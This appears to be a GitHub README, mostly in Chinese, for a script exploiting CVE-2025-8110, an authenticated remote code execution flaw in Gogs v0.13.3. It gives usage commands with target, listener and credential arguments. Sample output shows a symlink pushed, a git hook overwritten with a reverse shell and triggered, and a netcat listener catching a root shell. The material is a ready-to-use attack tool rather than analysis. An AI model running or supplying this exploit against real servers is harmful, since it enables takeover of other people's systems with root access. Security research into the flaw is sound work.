manbahadurthapa1248/CVE-2025-8110-Authenticated-Remote-Code-Execution-on-Gogs-v0.13.3-
GitHub: manbahadurthapa1248/CVE-2025-8110-Authenticated-Remote-Code-Execution-on-Gogs-v0.13.3-
该项目提供了一种针对 Gogs v0.13.3 的认证远程代码执行漏洞利用方法,解决了在有凭证条件下获取反向 Shell 的问题。
Stars: 0 | Forks: 0
# CVE-2025-8110-Gogs v0.13.3 认证远程代码执行
在 Gogs (v0.13.3) 上获取反向 shell 的远程代码执行漏洞
此漏洞需要认证凭据和 API 令牌才能生效。
# 使用方法:
```
kali@kali: python3 gogs_rce.py
usage: gogs_rce.py [-h] -t TARGET -l LHOST -lp LPORT -e EMAIL -p PASSWORD -a TOKEN
gogs_rce.py: error: the following arguments are required: -t/--target, -l/--lhost, -lp/--lport, -e/--email, -p/--password, -a/--token
```
```
kali@kali: python3 gogs_rce.py -t http://target -l Listener_ip -lp 4444 -e hello@test.com -p hello123 -a token_here
[*] Target: http://target
[*] Identifying internal username from email...
[+] Authenticated as: hello (hello@test.com)
[*] Creating repository: pwn_rev_1775970279
[*] Initializing local repo and pushing symlink...
[master (root-commit) 49428b8] link creation
1 file changed, 1 insertion(+)
create mode 120000 evil.link
[*] Fetching SHA and overwriting hook with reverse shell...
[*] TRIGGERING: Check your listener on 4444...
[master d027fb0] trigger rce
1 file changed, 1 insertion(+)
create mode 100644 trigger.txt
Enumerating objects: 4, done.
Counting objects: 100% (4/4), done.
Delta compression using up to 4 threads
Compressing objects: 100% (2/2), done.
Writing objects: 100% (3/3), 272 bytes | 272.00 KiB/s, done.
Total 3 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)
[+] Push timed out (this is normal when reverse shell is active).
[+] Done.
```
这将为运行该进程的用户提供反向 shell。
```
kali@kali: nc -nlvp 4444
listening on [any] 4444 ...
connect to [ListenIP] from (UNKNOWN) [TargetIp] 39180
root@TargetIp:~/gogs-repositories/hello/pwn_rev_1775971368.git# id
id
uid=0(root) gid=0(root) groups=0(root)
```
标签:API令牌, APT, CISA项目, CVE-2025-8110, Git服务, Gogs, RCE, RuleLab, Web容器, 协议分析, 反向Shell, 命令注入, 开源软件漏洞, 攻击向量, 权限提升, 版本0.13.3, 编程工具, 网络安全研究, 认证绕过, 远程代码执行, 逆向工具